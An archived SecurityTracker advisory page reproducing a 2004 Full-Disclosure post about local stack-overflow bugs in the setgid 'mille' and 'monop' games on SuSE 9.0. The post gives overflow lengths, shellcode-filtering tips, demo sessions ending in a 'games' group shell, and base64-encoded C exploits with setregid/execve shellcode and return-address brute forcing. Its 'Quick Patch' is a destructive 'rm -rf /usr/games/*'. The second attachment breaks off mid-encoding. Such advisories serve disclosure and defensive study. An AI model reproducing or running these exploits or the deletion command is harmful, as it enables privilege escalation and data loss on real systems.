SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Game)  >   mille Vendors:   University of California, Regents of
Mille Buffer Overflow Lets Local Users Gain Elevated Privileges
SecurityTracker Alert ID:  1009857
SecurityTracker URL:  http://securitytracker.com/id/1009857
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 19 2004
Impact:   Execution of arbitrary code via local system, User access via local system
Exploit Included:  Yes  

Description:   A stack overflow vulnerability was reported in the mille game (part of the bsd-games package). A local user can gain elevated privileges.

narko tix reported that a local user can trigger a stack overflow when saving a game. A local user can reportedly supply a filename of 112 bytes to trigger the overflow and execute arbitrary code.

The game is reportedly installed with set group id (setgid) 'games' group privileges, the report said.

A demonstration exploit is provided in the Source Message [it is Base64 encoded].

Impact:   A local user can execute arbitrary code with 'games' group privileges.
Solution:   No solution was available at the time of this entry.
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] Suse 9.0 Multiple gid = 20(games) vulnz


This is a multi-part message in MIME format...

------------=_1082214415-23418-0
Content-Type: text/plain; charset="iso-8859-1"
Content-Disposition: inline
Content-Transfer-Encoding: 7bit

                       ----- S3CTI0N 0x01 -----
			 
-Bug : Suse 9.0 /usr/games/mille l0c4l l4m3 st4ck 0v3rfl0w.(Wh3n s4vin9 th3 g4m3).
       Pr0gr4m  suid3d t0 games wi7h d3f4ul7.       

-3xpl0i747i0n : 0x01-) m4nu4l-)  112 byt3s fil3n4m3 is 3n0ugh for m4nu4lly 3xpl0i747i0n.
                                 us3 y0ur ASCII r3t 4ddr3ss for fil3n4m3.

                0x02-) 3xpl0i7-) Us3 Sh3llc0d3 which unfilt3rs '\x0b' ,'\n', '\x90','\220' ch4r4ct3rs.
		    XOR them.'c4us3 mill3 c0nv3rts th4t shi77y ch4r4ct4rs to '~P'. 3sp3ci4lly 0x90 4nd \220.
		    Us3 y0ur 0wn sh3llc0d3 in th3 4tt4ch3d c0d3.
-D3m0ns7r4ti0n:

addicted@labs:~/c-hell$ ./env
RET =  ~?

addicted@labs:~/c-hell$ /usr/games/mille
--HAND--            --DECK--            |                    ----   ----   -----
P                     89                |        Hand Total     0     0
1 75                --DISCARD--         |                   -----  -----
2 Go                                    |     Overall Total     0     0 
3 Gasoline                              |              Games    0     0
4 Repairs           file:  ~? ~? ~? ~|                              
? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~| p: pick            q: quit
? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~| u: use #           o: order hand
? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~| d: discard #       s: save      
? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~| w: toggle window   r: reprint
? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~|                              
? ~? ~? ~? ~? ~? ~? ~? ~? ~? sh-2.05b$ uid=1001(addicted) gid=20(games) groups=100(users)



                       ----- S3CTI0N 0x02 -----   

-Bug : Suse 9.0 /usr/games/monop l0c4l l4m3 st4ck 0v3rfl0w.7hiz iz 4n 0ld but g4m3 iz s7ill vuln3r4bl3.
       0v3rfl0w in 1. pl4y3rn4m3.(4ls0 th3 0th3rs)
       Pr0gr4m suid3d games by d3f4ul7
-3xpl0i747i0n : 0x01-) m4nu4l-) 304 byt3s pl4y3rn4m3 is 3n0ugh f0r 3xpl0i747i0n.
                       Us3 y0ur ASCII r3t 4ddr3ss.
		    
		0x02-) 3xpl0i7-) Us3 sh3llc0d3 which is n0t c0nt4ins s0m3 ch4rs like '\x0b'. XOR them.
		       3xpl0i7 4tt4ch3d.
-D3m0nstr4ti0n:
addicted@labs:~/c-hell$ ./env
RET =  ~?	     
addicted@labs:~/c-hell$ /usr/games/monop
How many players? 1
Player 1's name:  ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~?
~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~?
~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~?
~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~?
~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~?
~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~?
~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~? ~?
sh-2.05b$ id
uid=1001(addicted) gid=20(games) groups=100(users)
sh-2.05b$ 

                    ----- S3C7I0N 0x03 -----
C0nclusi0n: Th3r3 4r3 t00 m4ny bin4ri3s s7ill vuln3r4bl3 t0 7his kind 0f bugz.Bu7 I'm t00 B0R3D.
Quick P4tch : rm -rf /usr/games/*
--------------------------------------------------------------------------------------------------------------------------------------


N4rK07IX

-- 
______________________________________________
Check out the latest SMS services @ http://www.linuxmail.org 
This allows you to send and receive SMS through your mailbox.


Powered by Outblaze

------------=_1082214415-23418-0
Content-Type: application/octet-stream; name="mille.c"
Content-Disposition: attachment; filename="mille.c"
Content-Transfer-Encoding: base64

LyogU3VzZSA5LjAgL3Vzci9nYW1lcy9taWxsZSBsb2NhbCBnaWQ9MjAoZ2Ft
ZXMpIFhwbDBpNwoKNHU3aDByOiBONHJLMDdJWCAgIG5hcmtvdGl4QGxpbnV4
bWFpbC5vcmcKClNjcmlwN2tpZGRpM1ogazMzcCB5MHVyIGg0bmR6IDR3NHkg
LCA3aGl6IG4wdCByMDB0IHNwbDBpNy4KQnVnOiAwdjNyZmwwdyB3aDNuIHM0
dmluZyB0aDMgZzRtMy4KRjB1bmQgYnkgOiBONHJLMDdpWCAgLCB0aDRueCB0
byAweDdiZjIgZjByIGhpcyBncjM0dCBTdXNlIEIwWC4KM3hwbDBpNzQ3aTBu
IDogbWlsbDMgaXogZmlsNzNyaW5nIHMwbTMgY2g0cjRjNzNyeiBsaWszICcw
eDkwJyAnXDIyMCcgNG5kIG0wcjMuCiAgICAgICAgICAgICAgIHMwIHVzMyB5
MHVyIHNtNHI3IHNoM2xsYzBkMyAsIFhPUiA3aDR0IGNoNHJ6LiAKUXVpY2sg
UDQ3Y2ggOiBybSAtcmYgL3Vzci9nYW1lcy9taWxsZQoKR3IzM3RaOiAweDdi
ZjIsbWF0aG1vbmtleSxFZm5ldCwgQmxhY2toYXQgQ29tbXVuaXR5LGQ0bW4z
ZCxzdXNwM2N0M2RndXkseG9yZWRtYW4sZ290Y2hhLGZvcmtib21iCgpMNHN0
IFcwcmR6OiBCaWdtdTc0bjcgc2VuIGNvayBhc2FnaWxpayBiaSBpbnNhbnNp
biBkb3N0dW0sIGRlZGlnaW5pIGthYnVsIGVkaXlvcnVtLCBhbmxhc21hbWl6
IHZhcmRpOwogICAgICAgICAgICBhbWEgc2VuIG9udW5kYSB1c3Rlc2luZGVu
IGdlbGVtZWRpbiwzLiB5ZSBuZSBkZXJzaW4/IEV2ZXQgRXZldCBrYWJ1bCBl
ZGl5b3JzdW4gYmlsaXlvcnVtLAoJICAgIG5lIGRlIG9sc2EgMzEzMzcgY29k
ZXJzaW4gISEhLiBFeHBsb2l0IGt1bGxhbm1hZGFuIE1heCA0NSBzYW5peWVk
ZSBOdCBkZXlpbSBiaWxpeW9yc3VuISEhKHV6dWxtZSBnZWNlY2VrdGlyISkK
CSAgICA1TWIgaGF0dGltIG9sbWFzYSBkYSAgMTcwMCBjaXNjbyBmaXJld2Fs
bCBuYXNpbCBieXBhc3MgZWRpbGlyIG8gemFtYW4gZ29yZWNla3Npbi4uLi5T
ZW5pbiBrYWRhciB6ZW5naW4KCSAgICBvbG1heWFiaWxpcmltIGZha2F0IGJp
emltIGRlbGlrYW5saSBnaWJpIHl1cmVnaW1peiB2YXIuIEJpemUgeWFraXNt
YXosIHNlbmluIGdpYmkgY29uc29sZS1raWRkeQoJICAgIGJ1IHVsa2VkZSB5
ZXRlcmluY2UgdmFyLi4gWWVyaW5kZSBvbHNhbSBvIHdvcm0gdW4gdXplcmlu
ZGUgYmlyYXogZGFoYSBjYWxpc2lyZGltLCAyIGF5YSBrYWxtYXogYml0aXlv
cmR1LAoJICAgIG5lIG9sZHUgeW9rc2EgZmF6bGEgYmVzbGV5ZW1lZGluIG1p
IHNvbHVjYW5pLCwsIFNhbmEgbmUga2FkYXIgc295bGVzZW0gYXogZG9zdHVt
Li4uQnUgdWxrZXlpIHNlbmluIGdpYmkgQWxsYWgnc2l6CgkgICAga2l0YXBz
aXpsYXJhIGJpcmFrbWljYXogYnVudSBkYSBiaWwuIElUVSBkZSBoaWRyb2xp
Z2luIG9yZGEgeWluZSBiZWtsaW9ydW0sIHRha2kgc2VuaW4geWVuaWxnaXll
IGRveWR1Z3VuIGFuYSBrYWRhci4uLgoJICAgIAoJICAgIEVGU0FORUxFUiBI
SUMgQklSIFpBTUFOIE9MTUVaTEVSICEhISEgVGhhbnguCgkgICAgCgkgICAK
CSAgICAKCgoKKi8KCiNpbmNsdWRlIDxzdGRpby5oPgojaW5jbHVkZSA8c3Ry
aW5nLmg+CiNpbmNsdWRlIDx1bmlzdGQuaD4KI2luY2x1ZGUgPHN5cy93YWl0
Lmg+CiNpbmNsdWRlIDxzaWduYWwuaD4KI2luY2x1ZGUgPHN5cy90eXBlcy5o
PgojaW5jbHVkZSA8ZXJybm8uaD4KI2RlZmluZSBCVUZGRVJTSVpFIDExMgoj
ZGVmaW5lIFBBVEggIi91c3IvZ2FtZXMvbWlsbGUiCiNkZWZpbmUgUFJPRyAi
bWlsbGUiCiNkZWZpbmUgRU5URVIgIlxuIiAKI2RlZmluZSBOT1AgIDB4OTAg
Ly8gPC0tLSBtaWxsZSBpeiBmaWx0M3JpbmcgMHU3IE5PUC4gUHJpbjdpbmcg
J35QJwojZGVmaW5lIERFQyA0MAojZGVmaW5lIEJSVVRFX1NUQVJUIDB4YmZm
ZmZmZjQKdW5zaWduZWQgbG9uZyBnZXRlc3AoKQp7CiAgICAgICAgX19hc21f
XygibW92bCAlZXNwLCAlZWF4Iik7Cn0KCiAgICBjaGFyIHNoZWxsY29kZVtd
PSAvLyBQdXQgaDNyMyB5MHVyIHNtNHI3IHNoM2xsYzBkMwovKiBzZXRyZWdp
ZCAoMjAsMjApICovCiAgICAiXHgzMVx4YzBceDMxXHhkYlx4MzFceGM5XHhi
M1x4MTRceGIxXHgxNFx4YjBceDQ3IgogICAgIlx4Y2RceDgwIgoKICAgIC8q
IGV4ZWMgL2Jpbi9zaCAqLwogICAgIlx4MzFceGQyXHg1Mlx4NjhceDZlXHgy
Zlx4NzNceDY4XHg2OFx4MmZceDJmXHg2MiIKICAgICJceDY5XHg4OVx4ZTNc
eDUyXHg1M1x4ODlceGUxXHg4ZFx4NDJceDBiXHhjZFx4ODAiOwoKY2hhciAg
YnVmZmVyW0JVRkZFUlNJWkVdOwpjaGFyICpwb2ludGVyOwogCgp2b2lkIHZ1
bG5fc3RhcnQoKQp7CnN0YXRpYyBGSUxFICpsYW1lbWlsbGU7CnN0YXRpYyBj
aGFyICpmaXJldXBtaWxsZSA9ICIvdXNyL2dhbWVzL21pbGxlIjsKc3RhdGlj
IGNoYXIgc2F2ZWZpbGVbXT0icyI7CmNoYXIgKmZpbGVuYW1lID0gYnVmZmVy
OwoKbGFtZW1pbGxlID0gcG9wZW4oZmlyZXVwbWlsbGUsInJ3Iik7CmZwcmlu
dGYobGFtZW1pbGxlLCIlcyIsc2F2ZWZpbGUpOwpmZmx1c2gobGFtZW1pbGxl
KTsKCmZwcmludGYobGFtZW1pbGxlLCIlcyIsZmlsZW5hbWUpOwpmZmx1c2go
bGFtZW1pbGxlKTsKCmZwcmludGYobGFtZW1pbGxlLCIlcyIsRU5URVIpOwpm
Zmx1c2gobGFtZW1pbGxlKTsKcGNsb3NlKGxhbWVtaWxsZSk7Cn0KCgppbnQg
Y2hpbGRfcHJvY2VzcygpCnsKaW50IGk7CmludCBzdGF0dXM7CnBpZF90IHBp
ZDsKcGlkX3Qgd2FpdHBpZDsKcGlkID0gZm9yaygpOwogIGlmKHBpZCA9PSAt
MSkKICAgIHsgZnByaW50ZihzdGRlcnIsIlstXSVzLiBGb3JrIEZhaWxlZCFc
biIsc3RyZXJyb3IoZXJybm8pICk7CiAgICAgIGV4aXQoMTI3KTsKICAgIH0K
ICBlbHNlIGlmIChwaWQgPT0gMCkKICAgIHsgdnVsbl9zdGFydCgpOwogICAg
ICAKICAgIH0KICAgICAgZWxzZSB7CiAgICAgICB3YWl0cGlkID0gd2FpdCgm
c3RhdHVzKTsKICAgICAgICAgIGlmKHdhaXRwaWQgPT0gLTEpCgkgICB7IGZw
cmludGYoc3RkZXJyLCJbLV0gJXMuIFdhaXQgRmFpbGVkISBcbiIsc3RyZXJy
b3IoZXJybm8pKTsKCSAgICAgZXhpdCgxKTsKCSAgIH0KCSAgIGVsc2UgaWYo
d2FpdHBpZCAhPSBwaWQpCgkgICBhYm9ydCgpOwoJICAgZWxzZSAKICAgICAg
ICAgICAgIHsKCSAgICAgICBpZihXSUZFWElURUQoc3RhdHVzKSkKCSAgICAg
ICAgICB7IHByaW50ZigiQ2hpbGQgVGVybWluYXRlZCBOb3JtYWxseS4gRXhp
dCBDb2RlID0gJWRcbiIsV0VYSVRTVEFUVVMoc3RhdHVzKSk7CgkJICAgIHJl
dHVybiBXRVhJVFNUQVRVUyhzdGF0dXMpOwoJCSAgfQoJICAgICAgIGVsc2Ug
aWYoV0lGU0lHTkFMRUQoc3RhdHVzKSkKCSAgICAgICAgICB7IHByaW50Zigi
Q2hpbGQgVGVybWluYXRlZCBBYm5vcm1hbGx5LiBFeGl0IENvZGUgPSAlZC4o
JXMpXG4iLFdURVJNU0lHKHN0YXR1cyksc3Ryc2lnbmFsKFdURVJNU0lHKHN0
YXR1cykpKTsKCQkgICAgcmV0dXJuIFdURVJNU0lHKHN0YXR1cyk7CgkgICAg
ICAgICAgICAgIGlmKCBDT1JFRFVNUChzdGF0dXMpICkKCQkgICAgICAgIHsg
cHJpbnRmKCIgQ29yZSBEdW1wZWQsQ29yZSBGaWxlIEdlbmVyYXRlZFxuIik7
CgkJCX0gIAogICAgICAgICAgICAgICAgICB9CgkgICAgICAgZWxzZXsgZnBy
aW50ZihzdGRlcnIsIlstXSBDaGlsZCBTdG9wcGVkXG4iKTsKCSAgICAgICAg
ICAgIH0KICAgICAgICAgICAgIH0gICAKICAgICAgICAgIH0KCSAgCiAgICAg
cmV0dXJuIDE7CiB9CmludCBtYWtlX2J1ZmZlcih1bnNpZ25lZCBsb25nIHJl
dCkKewovKmJ1ZmZlciA9IChjaGFyICopbWFsbG9jKEJVRkZFUlNJWkUqc2l6
ZW9mKGNoYXIpKTsKaWYoIWJ1ZmZlcikKICB7CiAgIGZwcmludGYoc3RkZXJy
LCJtYWxsb2MoKSBmYWlsZWQuICIpOwogICBleGl0KC0xKTsKICAgfQoqLyAg
ICAKICAgY2hhciBsID0gIChyZXQgJiAweDAwMDAwMGZmKTsKICAgY2hhciBh
ID0gIChyZXQgJiAweDAwMDBmZjAwKSA+PiA4OwogICBjaGFyIG0gPSAgKHJl
dCAmIDB4MDBmZjAwMDApID4+IDE2OwogICBjaGFyIGUgPSAgKHJldCAmIDB4
ZmYwMDAwMDApID4+IDI0OwoKbWVtc2V0KGJ1ZmZlcixOT1AsQlVGRkVSU0la
RSk7Cm1lbWNweSgmYnVmZmVyW0JVRkZFUlNJWkUtNC1zdHJsZW4oc2hlbGxj
b2RlKV0sc2hlbGxjb2RlLHN0cmxlbihzaGVsbGNvZGUpKTsKCmJ1ZmZlclsx
MDhdID0gbDsKYnVmZmVyWzEwOV0gPSBhOwpidWZmZXJbMTEwXSA9IG07CmJ1
ZmZlclsxMTFdID0gZTsKCnJldHVybigwKTsKfQoKaW50IGJydXRlZm9yY2Uo
dW5zaWduZWQgbG9uZyBmaXJzdHJldCkKewppbnQgZm91bmQ7CmxvbmcgaTsK
dW5zaWduZWQgbG9uZyByZXQ7CmZwcmludGYoc3Rkb3V0LCJbK10gQnJ1dGVm
b3JjZSBTdGFydGluZyEhIVxuIik7CmZwcmludGYoc3Rkb3V0LCJmaXJzdHJl
dCA9ICVsdVxuIixmaXJzdHJldCk7CmZvcihpID0gZmlyc3RyZXQgOyBpPDAg
OyBpKz1ERUMpCiAgICAgewogICAgIGZwcmludGYoc3Rkb3V0LCJbK10gVGVz
dGluZyBSZXQgQWRkcmVzcyAweCV4XG4iLGkpOwogICAgIG1ha2VfYnVmZmVy
KGkpOwogICAgIGZvdW5kID0gY2hpbGRfcHJvY2VzcygpOwogICAgICBpZihm
b3VuZCA9PSAwKQogICAgICAgIHsgcHJpbnRmKCJSZXQgQWRyZXNzIEZvdW5k
ID0gMHgleFxuIixpKTsKCSAgYnJlYWs7Cgl9CiAgICB9CiAgIHJldHVybigw
KTsKIH0gICAKCnZvaWQgYmFubmVyKGNoYXIgKmFyZ3YwKQp7CmZwcmludGYo
c3RkZXJyLCItLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS1cbiIpOwpmcHJpbnRmKHN0ZGVyciwiU3VzZSA5LjAgL3Vzci9nYW1lcy9t
aWxsZSBsb2NhbCBFeHBsb2l0XG4iKTsKZnByaW50ZihzdGRlcnIsIjR1dGgw
cjogTjRySzA3SVhcbiIpOwpmcHJpbnRmKHN0ZGVyciwiPT4gbmFya290aXhA
bGludXhtYWlsLm9yZ1xuIik7CmZwcmludGYoc3RkZXJyLCJCcnV0ZSBGb3Jj
ZTogJXMgLWJcbiIsYXJndjApOwpmcHJpbnRmKHN0ZGVyciwiTWFudWVsIFJl
dDogICVzIC1hIHJldFxuIixhcmd2MCk7CmZwcmludGYoc3RkZXJyLCItLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1cbiIpOwogICAg
ICAgICAgICAgIAogICAgIAogICAgIAogfQogbWFpbihpbnQgYXJnYywgY2hh
ciAqYXJndltdKQogewogIGNoYXIgKm9wdGlvbmxpc3QgPSAiYmE6aDoiOwog
IGludCBvcHRpb247CiAgdW5zaWduZWQgbG9uZyBzdGFydCA9IEJSVVRFX1NU
QVJUOwogIHVuc2lnbmVkIGxvbmcgIGNob29zZTsKICBpbnQgdV9yX3Njcmlw
dF9raWRkeSA9IDA7CiAgaW50IE9wdGVyciA9IDE7CiAgYmFubmVyKGFyZ3Zb
MF0pOwogIGlmKGFyZ2MgPCAyKQogIGZwcmludGYoc3RkZXJyLCJVc2UgLWgg
Zm9yIGhlbHBcbiIpOwogIHdoaWxlKCAob3B0aW9uID0gZ2V0b3B0KGFyZ2Ms
YXJndixvcHRpb25saXN0KSApICE9IC0xKQogICAgICAgc3dpdGNoKG9wdGlv
bikKICAgICAgICB7IAoJICBjYXNlICdiJzoKCSAgIHVfcl9zY3JpcHRfa2lk
ZHk9MTsKCSAgIGJyZWFrOwoJICAKCSAgY2FzZSAnaCc6CgkgICBiYW5uZXIo
YXJndlswXSk7CgkgICBicmVhazsgCgkgICAKCSAgY2FzZSAnYSc6CiAgICAg
ICAgICAgY2hvb3NlID0gc3RydG91bChvcHRhcmcsTlVMTCwwKTsKICAgICAg
ICAgICBtYWtlX2J1ZmZlcihjaG9vc2UpOwogICAgICAgICAgIGNoaWxkX3By
b2Nlc3MoKTsKICAgICAgICAgICBleGl0KDApOwogICAgICAgICAgIGJyZWFr
OwoJICAKCSAgY2FzZSAnPyc6CgkgICBmcHJpbnRmKHN0ZGVyciwiVW5rbm93
biBPcHRpb24gXG4iKTsKCSAgIGJhbm5lcihhcmd2WzBdKTsKCSAgIGV4aXQo
LTEpOwoJICAgCgkgIGRlZmF1bHQ6CgkgICBiYW5uZXIoYXJndlswXSk7Cgkg
ICBleGl0KC0xKTsKCX0KICAgaWYodV9yX3NjcmlwdF9raWRkeSkKICAgICBi
cnV0ZWZvcmNlKHN0YXJ0KTsKICAgICAgcmV0dXJuIDA7Cn0gICAgCg==

------------=_1082214415-23418-0
Content-Type: application/octet-stream; name="monopexp.c"
Content-Disposition: attachment; filename="monopexp.c"
Content-Transfer-Encoding: base64

LyogU3VzZSA5LjAgL3Vzci9nYW1lcy9tb25vcCBMMGM0bCBnaWQ9MjAoZ2Ft
ZXMpIHhwbG9pdC4KCjR1N2gwcjogTjRySzA3SVgKPT4gbmFya290aXhAbGlu
dXhtYWlsLm9yZwoKQnVnOiAwdjNyZmwwdyBpbiAxLiBwbDR5M3IgbjRtMygw
N2gzcnMgNHIzIHAwc3NpYmwzKSwgMzA0IGJ5dDNzIG9mIHBsNHkzcm40bTMg
aXMgM24wdWdoIGZvciB4cGwwaTc0N2kwbgoKdGg0bmtzIDB4N2JmMiBmMHIg
aGlzIHN1c2UgYjB4LgoKR3IzM3RaOiBtYXRobW9ua2V5LDB4N2JmMixFRm5l
dCxibGFja2hhdCBjb21tdW5pdHksZ3Jhdmk3eSxGT1pUUksKU2hvdTd6OmJp
Z211NzRuNyA0bmQgaGlzIGw0bTMgY3IzdwoKTDRzdHcwcmR6OkRyZWFtR29k
IEZhemxhIGRlaWwgYmkga2FjIGd1biBzb3JhIHJlbW90ZSB3aW4yayB5aSBy
ZWxlYXNlIGV0Y2VtLCBzY3JpcHRraWRkeSBrb3J1bWFsaShmYXpsYSB1bXV0
bGFubWEgc2FraW4gISkKICAgICAgICAgIEJpbGl5b3J1bSBsMzN0IGhheDBy
c3VuICEhIE8geWF6ZGlnaW4gcmVtb3RlMmsgZW5jcnlwdGVkIG9sYXJhayBi
aXogZGUgZGUgdmFyIGNvayBoZXZlc2xlbm1lLHNlbiB2ZSBzZW5pbgoJICBl
bGl0ZSB0YWtpbWluaW4geWF6ZGlnaSAxMDAgc2F0aXIgY29kdSBiZW4gMTUg
ZGFra2FkYSB5YXppeW9ydW0gbyB5dXpkZW4gcmFraWJpbSBkZWlsc2luaXos
YW1hIHN1bnUgZGEgdW51dG1ha2ksIAogICAgICAgICAgRUZTQU5FTEVSIEhJ
QyBCSVIgWkFNQU4gT0xNRVpMRVIgISEhISEKCiovCgojaW5jbHVkZSA8c3Rk
aW8uaD4KI2luY2x1ZGUgPHN0cmluZy5oPgojaW5jbHVkZSA8dW5pc3RkLmg+
CiNpbmNsdWRlIDxzeXMvd2FpdC5oPgojaW5jbHVkZSA8c2lnbmFsLmg+CiNp
bmNsdWRlIDxzeXMvdHlwZXMuaD4KI2luY2x1ZGUgPGVycm5vLmg+CiNkZWZp
bmUgQlVGRkVSU0laRSAzMDQgCiNkZWZpbmUgUEFUSCAiL3Vzci9nYW1lcy9t
b25vcCIKI2RlZmluZSBQUk9HICJtb25vcCIKI2RlZmluZSBFTlRFUiAiXG4i
IAojZGVmaW5lIE5PUCAgJ1wyMjAnCiNkZWZpbmUgREVDIDUwCiNkZWZpbmUg
UkVEICJcMDMzWzMxbSIKI2RlZmluZSBDT05TT0xFICJcMDMzWzBtIgojZGVm
aW5lIEJSVVRFX1NUQVJUIDB4YmZmZmY2ZDAgLy9wbGF5IHdpdGggaXQKCnVu
c2lnbmVkIGxvbmcgZ2V0ZXNwKCkKewogICAgICAgIF9fYXNtX18oIm1vdmwg
JWVzcCwgJWVheCIpOwp9CiAgICBjaGFyIHNoZWxsY29kZVtdPSAvLyBQdXQg
aDNyMyB5MHVyIHNtNHI3IHNoM2xsYzBkMwovKiBzZXRyZWdpZCAoMjAsMjAp
ICovCiAgICAiXHgzMVx4YzBceDMxXHhkYlx4MzFceGM5XHhiM1x4MTRceGIx
XHgxNFx4YjBceDQ3IgogICAgIlx4Y2RceDgwIgoKICAgIC8qIGV4ZWMgL2Jp
bi9zaCAqLwogICAgIlx4MzFceGQyXHg1Mlx4NjhceDZlXHgyZlx4NzNceDY4
XHg2OFx4MmZceDJmXHg2MiIKICAgICJceDY5XHg4OVx4ZTNceDUyXHg1M1x4
ODlceGUxXHg4ZFx4NDJceDBiXHhjZFx4ODAiOwoKY2hhciAgYnVmZmVyW0JV
RkZFUlNJWkVdOwpjaGFyICpwb2ludGVyOwogCgp2b2lkIHZ1bG5fc3RhcnQo
KQp7CnN0YXRpYyBGSUxFICpsYW1lbW9ubzsKc3RhdGljIGNoYXIgZmlyZXVw
bW9ub1tdID0gIi91c3IvZ2FtZXMvbW9ub3AiOwpzdGF0aWMgY2hhciBwbGF5
ZXJudW1iZXJbXT0iMVxuIjsKc3RhdGljIGNoYXIgKnBsYXllcm5hbWUgPSBi
dWZmZXI7CgpsYW1lbW9ubyA9IHBvcGVuKGZpcmV1cG1vbm8sInJ3Iik7Cmlm
KCFwb3BlbikKIHsgZnByaW50ZihzdGRlcnIsIlstXSVzIENvdWxkIG5vdCBj
cmVhdGUgZmlsZVxuIixzdHJlcnJvcihlcnJubykpOwogICBleGl0KDEpOwog
fQpmcHJpbnRmKGxhbWVtb25vLCIlcyIscGxheWVybnVtYmVyKTsKZmZsdXNo
KGxhbWVtb25vKTsKCmZwcmludGYobGFtZW1vbm8sIiVzIixwbGF5ZXJuYW1l
KTsKZmZsdXNoKGxhbWVtb25vKTsKCmZwcmludGYobGFtZW1vbm8sIiVzIixF
TlRFUik7CmZmbHVzaChsYW1lbW9ubyk7CnBjbG9zZShsYW1lbW9ubyk7Cn0K
CgppbnQgY2hpbGRfcHJvY2VzcygpCnsKaW50IGk7CmludCBzdGF0dXM7CnBp
ZF90IHBpZDsKcGlkX3Qgd2FpdHBpZDsKcGlkID0gZm9yaygpOwogIGlmKHBp
ZCA9PSAtMSkKICAgIHsgZnByaW50ZihzdGRlcnIsIlstXSVzLiBGb3JrIEZh
aWxlZCFcbiIsc3RyZXJyb3IoZXJybm8pICk7CiAgICAgIGV4aXQoMTMpOwog
ICAgfQogIGVsc2UgaWYgKHBpZCA9PSAwKQogICAgeyAKICAgICAgIHZ1bG5f
c3RhcnQoKTsgICAgICAKICAgIH0KICBlbHNlIHsgd2FpdHBpZCA9IHdhaXQo
JnN0YXR1cyk7CiAgICAgICAgICBpZih3YWl0cGlkID09IC0xKQoJICAgeyBm
cHJpbnRmKHN0ZGVyciwiWy1dICVzLiBXYWl0IEZhaWxlZCEgXG4iLHN0cmVy
cm9yKGVycm5vKSk7CgkgICAgIHJldHVybiAxOwoJICAgfQoJICAgZWxzZSBp
Zih3YWl0cGlkICE9IHBpZCkKCSAgIGFib3J0KCk7CgkgICBlbHNlIAogICAg
ICAgICAgICAgewoJICAgICAgIGlmKFdJRkVYSVRFRChzdGF0dXMpKQoJICAg
ICAgICAgIHsgcHJpbnRmKCJDaGlsZCBUZXJtaW5hdGVkIE5vcm1hbGx5LiBF
eGl0IENvZGUgPSAlZFxuIixXRVhJVFNUQVRVUyhzdGF0dXMpKTsKCQkgICAg
cmV0dXJuIFdFWElUU1RBVFVTKHN0YXR1cyk7CgkJICB9CgkgICAgICAgZWxz
ZSBpZihXSUZTSUdOQUxFRChzdGF0dXMpKQoJICAgICAgICAgIHsgcHJpbnRm
KCJDaGlsZCBUZXJtaW5hdGVkIEFibm9ybWFsbHkuIEV4aXQgQ29kZSA9ICVk
ICJSRUQiKCVzKSJDT05TT0xFIlxuIixXVEVSTVNJRyhzdGF0dXMpLHN0cnNp
Z25hbChXVEVSTVNJRyhzdGF0dXMpKSk7CgkJICAgIHJldHVybiBXVEVSTVNJ
RyhzdGF0dXMpOwoJICAgICAgICAgICAgICBpZiggQ09SRURVTVAoc3RhdHVz
KSApCgkJICAgICAgICB7IHByaW50ZigiIENvcmUgRHVtcGVkLENvcmUgRmls
ZSBHZW5lcmF0ZWRcbiIpOwoJCQl9ICAKICAgICAgICAgICAgICAgICAgfQoJ
ICAgICAgIGVsc2V7IGZwcmludGYoc3RkZXJyLCJbLV0gQ2hpbGQgU3RvcHBl
ZFxuIik7CgkgICAgICAgICAgICB9CiAgICAgICAgICAgICAgfSAgCiAgICAg
ICAgICB9CiAgICAgcmV0dXJuIDE7CiB9CmludCBtYWtlX2J1ZmZlcih1bnNp
Z25lZCBsb25nIHJldCkKewovKmJ1ZmZlciA9IChjaGFyICopbWFsbG9jKEJV
RkZFUlNJWkUqc2l6ZW9mKGNoYXIpKTsKaWYoIWJ1ZmZlcikKICB7CiAgIGZw
cmludGYoc3RkZXJyLCJbLV1tYWxsb2MoKSBmYWlsZWQuICIpOwogICBleGl0
KC0xKTsKICAgfQoqLyAgICAKICAgY2hhciBsID0gIChyZXQgJiAweDAwMDAw
MGZmKTsKICAgY2hhciBhID0gIChyZXQgJiAweDAwMDBmZjAwKSA+PiA4Owog
ICBjaGFyIG0gPSAgKHJldCAmIDB4MDBmZjAwMDApID4+IDE2OwogICBjaGFy
IGUgPSAgKHJldCAmIDB4ZmYwMDAwMDApID4+IDI0OwogICAKbWVtc2V0KGJ1
ZmZlcixOT1AsQlVGRkVSU0laRSk7Cm1lbWNweSgmYnVmZmVyW0JVRkZFUlNJ
WkUtNC1zdHJsZW4oc2hlbGxjb2RlKV0sc2hlbGxjb2RlLHN0cmxlbihzaGVs
bGNvZGUpKTsKYnVmZmVyWzMwMF0gPSBsOwpidWZmZXJbMzAxXSA9IGE7CmJ1
ZmZlclszMDJdID0gbTsKYnVmZmVyWzMwM10gPSBlOwpyZXR1cm4oMCk7Cn0K
CmludCBicnV0ZWZvcmNlKHVuc2lnbmVkIGxvbmcgZmlyc3RyZXQpCnsKbG9u
